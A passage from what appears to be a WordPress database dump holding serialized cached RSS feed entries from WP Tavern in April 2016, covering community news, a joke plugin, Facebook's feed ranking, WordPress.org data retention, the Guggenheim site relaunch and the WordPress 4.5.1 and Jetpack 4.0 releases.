wp-att-50955\"><img class=\"size-full wp-image-50955\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/01/ICYMIFeaturedImage.png?resize=676%2C292\" alt=\"In Case You Missed It Featured Image\" /></a>photo credit: <a href=\"http://www.flickr.com/photos/112901923@N07/16153818039\">Night Moves</a> – <a href=\"https://creativecommons.org/licenses/by-nc/2.0/\">(license)</a>\n<p>There’s a lot of great WordPress content published in the community but not all of it is featured on the Tavern. This post is an assortment of items related to WordPress that caught my eye but didn’t make it into a full post.</p>\n<h2>Matt Mullenweg’s Father Passes Away</h2>\n<p>Losing a loved one is tough, especially when it’s a parent. Matt Mullenweg’s father, Chuck Mullenweg, recently passed away. Matt <a href=\"https://ma.tt/2016/04/in-memoriam-chuck-mullenweg/\">published a touching tribute</a> on his site that describes the kind of man his father was.</p>\n<blockquote><p>We were in a father / son bowling league. I remember admiring his work ethic so much: he’d get up before dawn every morning and put on a suit, grab his briefcase, and go to work. He often went in on weekends and I loved to go with him because they had ‘fast’ internet at the office and I could read Dilbert and about Babylon 5. He was a voracious reader and learner, and loved tinkering whether it was cars or networking. In the other room I can hear a bitcoin mining rig he set up a few years ago. He was independent minded and unafraid to question the status quo.</p></blockquote>\n<p>My deepest sympathies and condolences go out to the Mullenweg family. You can read <a href=\"http://ma.tt/chuck/\">Chuck’s obituary here</a>.</p>\n<h2>My First Plugin</h2>\n<p>Thanks to <a href=\"https://profiles.wordpress.org/binarygary/\">Binarygary,</a> my first plugin is in the directory. It’s called <a href=\"https://wordpress.org/plugins/hello-admin/\">Hello Admin</a> and with each page load, a lyric from Hello Dolly displays as an admin notice.</p>\n<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/04/HelloAdminScreenshot.png\"><img class=\"size-full wp-image-54005\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/04/HelloAdminScreenshot.png?resize=706%2C390\" alt=\"Hello Admin in Action\" /></a>Hello Admin in Action\n<p>In all seriousness, the plugin is a joke and a humorous way to bring attention to developers <a href=\"http://wptavern.com/please-stop-abusing-wordpress-admin-notices\">abusing admin notices</a> in WordPress.</p>\n<h2>Pressware Partners with Evermore</h2>\n<p>Tom McFarlin <a href=\"https://tommcfarlin.com/evermore/\">announced that his</a> company Pressware, is partnering with <a href=\"https://evermo.re/\">Evermore</a>. The partnership allows Pressware to provide its expertise in custom WordPress development and project management to Evermore’s customers.</p>\n<h2>Four Years of EDD</h2>\n<p>Pippin Williamson <a href=\"https://pippinsplugins.com/edd-4-years/\">shared the hardships and successes</a> he’s experienced in the last four years managing Easy Digital Downloads.</p>\n<blockquote><p>Today, Easy Digital Downloads is installed on over 50,000 websites, has reached nearly one million downloads, and has grown to a sustainable business that supports the livelihood of an ever-growing team comprised of full time employees and active contractors. I don’t think I ever thought we would be where we are today four years ago.</p></blockquote>\n<p>His post is an honest look at the amount of effort and circumstances beyond revenue that’s involved with running a successful business.</p>\n<h2>Translation Day Wapuu Posters!</h2>\n<p>In what is a traditional part of this series, I end each issue by featuring a Wapuu design. For those who don’t know, Wapuu is the <a href=\"http://wapuu.jp/2015/12/12/wapuu-origins/\">unofficial mascot</a> of the WordPress project. The first <a href=\"http://wptavern.com/wordpress-global-translation-day-set-for-april-24-2016\">global translation day</a> takes place on April 24th and to celebrate the occasion, the WordPress Polyglots team has created a series of Wapuu posters.</p>\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\">New <a href=\"https://twitter.com/hashtag/WPTranslationDay?src=hash\">#WPTranslationDay</a> posters starring <a href=\"https://twitter.com/wp_wapuu\">@wp_wapuu</a> thanks to <a href=\"https://twitter.com/sonjaleix\">@sonjaleix</a>! Grab them while they’re hot! <a href=\"https://t.co/BfU9g8nG9S\">pic.twitter.com/BfU9g8nG9S</a></p>\n<p>— WPPolyglots (@TranslateWP) <a href=\"https://twitter.com/TranslateWP/status/723494729892110336\">April 22, 2016</a></p></blockquote>\n<p></p>\n<p>That’s it for issue eight. If you recently discovered a cool resource or post related to WordPress, please share it with us in the comments.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 23 Apr 2016 02:04:37 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:45;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:87:\"WPTavern: Facebook News Feed Now Favors Articles That Users Spend a Longer Time Reading\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=53919\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:97:\"http://wptavern.com/facebook-news-feed-now-favors-articles-that-users-spend-a-longer-time-reading\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3187:\"<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/04/reading.jpg\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/04/reading.jpg?resize=960%2C624\" alt=\"RC Cipriano\" class=\"size-full wp-image-53999\" /></a><a href=\"https://stocksnap.io/photo/F55691D3FB\">RC Cipriano</a>\n<p>Facebook <a href=\"https://newsroom.fb.com/news/2016/04/news-feed-fyi-more-articles-you-want-to-spend-time-viewing/\" target=\"_blank\">announced</a> yesterday that its news feed algorithm will now favor articles that users spend a long time reading. While likes, clicks, comments, and sharing counts are all valuable metrics, they are not always reliable determinants for what users want to see. Facebook discovered this by gathering feedback via its Feed Quality Program.</p>\n<p>As a result, the social network <a href=\"https://newsroom.fb.com/news/2015/06/news-feed-fyi-taking-into-account-time-spent-on-stories/\" target=\"_blank\">updated its algorithm last June</a> to factor in how much time users spent reading posts within the news feed, regardless of whether users even opened the article. <a href=\"https://newsroom.fb.com/news/2014/08/news-feed-fyi-click-baiting/\" target=\"_blank\">Two years ago</a>, Facebook also began factoring in instances where a user clicks on an article but then comes straight back to the news feed. This could be because a site loaded too slowly or the article was click-bait and not what the user was expecting based on the preview.</p>\n<p>“Building on this work, we’re learning that the time people choose to spend reading or watching content they clicked on from News Feed is an important signal that the story was interesting to them,” Facebook representatives said.<strong> “We are adding another factor to News Feed ranking so that we will now predict how long you spend looking at an article in the Facebook mobile browser or an Instant Article after you have clicked through from News Feed.”</strong></p>\n<p>Facebook will not be counting loading time towards this new ranking signal but will calculate the actual time spent reading/watching once the content has loaded. But before you think you can game this algorithm by simply publishing longer articles, Facebook will be measuring this time as a threshold so that longer articles are not preferred by default.</p>\n<p>The social network also announced that it will be diversifying its display of posts from different pages so as not to bombard users with too much content from the same source.</p>\n<p>“We’ve also heard from people that they enjoy reading articles from a wide range of publishers, and it can be repetitive if too many articles from the same source are back to back in their News Feed,” representatives said. “We’ll also be making an update to reduce how often people see several posts in a row from the same source in their News Feed.”</p>\n<p>Publishers who depend on Facebook for a significant amount of their referrals will want to take note of these changes to the news feed algorithm. The social network has already started rolling them out and will continue over the next few weeks.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 22 Apr 2016 22:21:20 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:46;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"WPTavern: What WordPress.org Does with the Data it Collects from Users Sites\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=53940\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:86:\"http://wptavern.com/what-wordpress-org-does-with-the-data-it-collects-from-users-sites\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5110:\"<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/12/FreemiusFeaturedImage.png\"><img class=\"size-full wp-image-49261\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/12/FreemiusFeaturedImage.png?resize=660%2C291\" alt=\"Freemius Featured Image\" /></a>photo credit: <a href=\"http://www.flickr.com/photos/29096601@N00/2920562020\">data slide</a> – <a href=\"https://creativecommons.org/licenses/by-nc/2.0/\">(license)</a>\n<p>Since I started covering WordPress in 2009, one of the things I’ve noticed is that certain topics have a cyclical nature to them. One of these <a href=\"http://wptavern.com/phoning-home-to-plugin-authors\">is the contention in the WordPress community</a> on what data is <a href=\"http://interconnectit.com/1722/who-is-wordpress-talking-to/\">sent, stored, and shared</a> on WordPress.org. In a <a href=\"http://torquemag.io/2016/04/user-data-wordpress-org-belong-community/\">post published</a> on Torquemag.io, Josh Pollock, Founder of <a href=\"https://calderawp.com/\">CalderaWP</a>, argues that WordPress is a community-driven project and as such, data collected by WordPress.org should be shared with the community.</p>\n<blockquote><p>If installing and updating themes via the WordPress dashboard wasn’t so easy, WordPress wouldn’t be what it is today. I understand and appreciate this.</p>\n<p>Here’s the part that doesn’t sit well with me: WordPress.org is collecting data on all of its users (as it should), but this information isn’t available in aggregate form to the community.</p></blockquote>\n<p>Pollock says that as an entrepreneur, the information would help him make informed business decisions.</p>\n<h2>Data is Stored for Two Days</h2>\n<p>I spoke to Samuel ‘Otto’ Wood, who helps maintain WordPress.org, and discovered that some of the assumptions people have are not true.</p>\n<p>“The data collection systems on <a href=\"http://w.org/\" target=\"_blank\" rel=\"noreferrer\">w.org</a> have been inconsistent at best, and re-written several times,” Wood said.</p>\n<p>“But the general idea that there is some kind of treasure trove of information we’re storing is misguided, at best. The data is collected, aggregated for the things we display, then tossed. We don’t store it for any serious length of time. Just the results of the data like the counts.”</p>\n<p>Gathering, sorting, and displaying the large amount of data associated with WordPress is a CPU intensive job. The most recent example of WordPress.org sharing aggregate data is for active installs of <a href=\"http://wptavern.com/wordpress-plugin-directory-launches-new-design\">plugins</a> and <a href=\"http://wptavern.com/the-wordpress-theme-directory-replaces-download-counts-with-the-number-of-active-installs\">themes</a>. Displaying the Active Install count is the result of significant performance improvements from WordPress lead developer <a href=\"http://wptavern.com/the-wordpress-theme-directory-replaces-download-counts-with-the-number-of-active-installs\">Dion Hulse</a>. Without the improvements, the data collection would have overloaded CPUs and MySQL databases.</p>\n<p>“Gathering that data is frickin’ difficult to start with, “Wood said. “For the longest time, we didn’t even have the actual system resources to pull off the ‘Active Installs’ count. We didn’t display that count because <b>we couldn’t do it</b>. The idea that we’re hiding things is ludicrous.”</p>\n<p>Raw data is stored for two days and is then overwritten, “basically, there’s too much data to store,” Wood said. “All of the data that <a href=\"http://w.org/\" target=\"_blank\" rel=\"noreferrer\">w.org</a> gathers is used to display the stats on <a href=\"http://w.org/\" target=\"_blank\" rel=\"noreferrer\">w.org</a> itself. Nothing special is hidden.”</p>\n<h2>Data Accuracy is Hard</h2>\n<p>If developers are going to make business decisions using public data, the data has to be accurate. Accuracy is a complex problem but the team has slowly made progress over the years as legacy systems on W.org are phased out.</p>\n<p>“A lot of the <a href=\"http://w.org/\" target=\"_blank\" rel=\"noreferrer\">w.org</a> systems are poorly made,” Wood said. “They’re old, have been modified dozens of times over the years, and badly in need of updating. For a long time, the data we gathered could not be processed fast enough so we simply threw over half of it away.</p>\n<p>“Mostly, we phase out old useless systems and replace them with something better and newer which gives us things to display. Active Install counts was an entirely new system that replaced an older one which didn’t give any useful information.”</p>\n<p>Wood confirms what I’ve believed to be true for a long time. WordPress.org is not storing data for an extended period of time and the information that is collected is likely on public display somewhere on the site. What types of data would you like to see on WordPress.org?</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 22 Apr 2016 20:38:26 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:47;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"WPTavern: Guggenheim.org Relaunches on WordPress Using the WP REST API\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=53954\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:80:\"http://wptavern.com/guggenheim-org-relaunches-on-wordpress-using-the-wp-rest-api\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2726:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/04/guggenheim.png\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/04/guggenheim.png?resize=1025%2C444\" alt=\"guggenheim\" class=\"aligncenter size-full wp-image-53969\" /></a></p>\n<p>The <a href=\"http://www.guggenheim.org/\" target=\"_blank\">Guggenheim</a> relaunched its website on WordPress this week. The site, which represents the collection of Guggenheim museums, was in need of an overhaul that would modernize its underlying architecture and design.</p>\n<p>Laura Kleger, who oversees the foundation’s online projects, explained why the Guggenheim chose WordPress for its new website. She said that the team began with a CMS analysis phase, which included Drupal and WordPress.</p>\n<p>“The ideal process for improving websites is incremental and rapid change, but the old Guggenheim.org had accumulated too much technical and structural debt to produce further results, and a big leap forward was required,” Kleger said.</p>\n<p>Prior to embarking on the project, the Guggenheim was running on Joomla, but the team had a difficult time implementing small changes.</p>\n<p>“We wanted to use a widely adopted, open-source CMS with enough muscle to meet advanced needs,” Kleger said. They needed a user-friendly way for museum staff to create and update content without requesting the help of of designers and developers for simple updates.</p>\n<p>“We chose WordPress for a few reasons – among them, the broad pool of developer resources, the excellence of the content administration interface, the rapid update release cycle, the ease of extending functionality, and the CMS’s deep taxonomy,” Kleger said.</p>\n<p>The Guggenheim partnered with New York-based development agency <a href=\"https://www.alleyinteractive.com/\" target=\"_blank\">Alley Interactive</a> for the website’s overhaul, who recommended implementing a headless version of WordPress with content served via the WP REST API. This allowed the team to build out the frontend of the site using AngularJS.</p>\n<p>“As noted by <a href=\"http://alistapart.com/column/nearly-headless-cms\" target=\"_blank\">others</a>, this approach is superior to the standard WordPress templating approach for achieving some of the more exciting possibilities in user experience today,” Kleger said.</p>\n<p>The new website is a beautiful example of the WP REST API in the wild. For a deeper look at the design and development process, check out Kleger’s <a href=\"http://www.guggenheim.org/blogs/checklist/meet-the-new-guggenheim-org\" target=\"_blank\">post announcing the new Guggenheim.org</a>.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 22 Apr 2016 13:34:51 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:48;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"WPTavern: WordPress 4.5.1 Expected Early Next Week\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=53935\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"http://wptavern.com/wordpress-4-5-1-expected-early-next-week\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1567:\"<p>WordPress 4.5 “Coleman” was <a href=\"http://wptavern.com/wordpress-4-5-coleman-released-introduces-custom-logos-responsive-previews-improved-editing-experience\">released last week</a> without too many issues. However, the WordPress development team recently identified two bugs that are prompting an immediate point release <a href=\"https://make.wordpress.org/core/2016/04/20/4-5-1-release-candidate-tomorrow-april-21st/\">scheduled for next week</a>.</p>\n<p>The <a href=\"https://core.trac.wordpress.org/ticket/36545\">first is that</a> TinyMCE toolbars and tabs are unresponsive in Chrome Version 50.0.2661.75 beta-m (64-bit). The second is that <a href=\"https://core.trac.wordpress.org/ticket/36510\">page templates with widgets are styled incorrectly</a>. WordPress 4.5 added a singular class that many themes use, including Twenty Eleven, that breaks a site’s layout. After a lengthy discussion and testing, the decision was to <a href=\"https://core.trac.wordpress.org/changeset/36112\">revert</a> the change.</p>\n<p><a href=\"https://wordpress.org/wordpress-4.5.1-RC2.zip\">WordPress 4.5.1 RC 1</a> is available and the core team wants as many people as possible to test the <a href=\"https://make.wordpress.org/core/2016/04/22/4-5-1-release-candidate/\">TinyMCE update and other bug fixes</a> included in the release. If you think you’ve discovered a bug, you’re encouraged to report it in the <a href=\"https://wordpress.org/support/forum/alphabeta\">Alpha/Beta section</a> of the support forums.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 22 Apr 2016 02:17:11 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:49;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:86:\"WPTavern: Jetpack 4.0 Released with UI Improvements and New Editor View for VideoPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=53910\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:96:\"http://wptavern.com/jetpack-4-0-released-with-ui-improvements-and-new-editor-view-for-videopress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2915:\"<p>Shortly after Jetpack 4.0 was released yesterday many <a href=\"https://wordpress.org/support/topic/fatal-error-when-updating-to-jetpack-40-read-this\" target=\"_blank\">users reported a fatal error and/or white screen when updating</a>. Developers started <a href=\"https://www.facebook.com/groups/168889943173228?view=permalink&id=1141144765947736\" target=\"_blank\">warning each other in the Advanced WordPress Facebook group to avoid updating to 4.0</a>, after having received emails from clients with sites that went down. A followup 4.0.2 release was pushed out today for users with the specific configuration that caused the fatal error.</p>\n<p>This is the third time in under two months that the Jetpack team has had to send out a followup update on the heels of a release to correct significant problems. Fortunately, the team worked quickly to get a fix out to sites with fatal errors.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/04/jetpack-ui-improvements.png\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/04/jetpack-ui-improvements.png?resize=286%2C300\" alt=\"jetpack-ui-improvements\" class=\"alignright size-medium wp-image-53926\" /></a>The 4.0 milestone brings major UI improvements for on-boarding new users. In previous versions of the plugin, visiting the Jetpack settings page showed a big green button prompting users to connect to WordPress.com.</p>\n<p>This release introduces a full page explaining the benefits of Jetpack to encourage users to hook it up. It also displays a picture of the development and support team, an explanation of Photon, and the benefits of the Protect module.</p>\n<p>Version 4.0 also adds a new editor view for VideoPress that lets users edit the shortcode in the editor with a new modal options window. This makes it easy to wrangle VideoPress settings directly in the editor</p>\n<p>A few other notable enhancements in this release include:</p>\n<ul>\n<li>Tighter WooCommerce Integration: Social sharing icons now appear on WooCommerce single product views</li>\n<li>Widget Visibility for Custom Post Type Archives: Show/hide widgets for CPT single or archive views</li>\n<li>Selective Refresh for Widgets: Widgets now update instantly with live previews in the customizer</li>\n<li>Updated schema.org Microdata for Breadcrumbs: Gives search engines a better understanding of a page’s position in the site hierarchy</li>\n</ul>\n<p>Jetpack 4.0 also adds performance enhancements for the Protect module and Contact Forms. The method it uses to clean the database of spam form submission records is now more efficient. Check out the <a href=\"https://wordpress.org/plugins/jetpack/changelog/\" target=\"_blank\">changelog</a> to see a full list of all the enhancements and fixes in this release. It should be safe to update your sites and clients’ sites to 4.0.2 without any ill effects.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 21 Apr 2016 21:46:05 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";a:10:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Wed, 11 May 2016 19:55:07 GMT\";s:12:\"content-type\";s:8:\"text/xml\";s:14:\"content-length\";s:6:\"213151\";s:10:\"connection\";s:5:\"close\";s:4:\"vary\";s:15:\"Accept-Encoding\";s:13:\"last-modified\";s:29:\"Wed, 11 May 2016 19:45:14 GMT\";s:15:\"x-frame-options\";s:10:\"SAMEORIGIN\";s:4:\"x-nc\";s:11:\"HIT lax 250\";s:13:\"accept-ranges\";s:5:\"bytes\";}s:5:\"build\";s:14:\"20130911090210\";}','no'),(25400,'_transient_timeout_feed_mod_d117b5738fbd35bd8c0391cda1f2b5d9','1463039707','no'),(25403,'_transient_feed_mod_d117b5738fbd35bd8c0391cda1f2b5d9','1462996507','no'),(25406,'_transient_timeout_feed_b9388c83948825c1edaef0d856b7b109','1463039708','no'),(25409,'_transient_feed_b9388c83948825c1edaef0d856b7b109','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n \n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:117:\"\n \n \n \n \n \n \n \n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"WordPress Plugins » View: Popular\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:45:\"https://wordpress.org/plugins/browse/popular/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"WordPress Plugins » View: Popular\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"en-US\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 11 May 2016 19:41:51 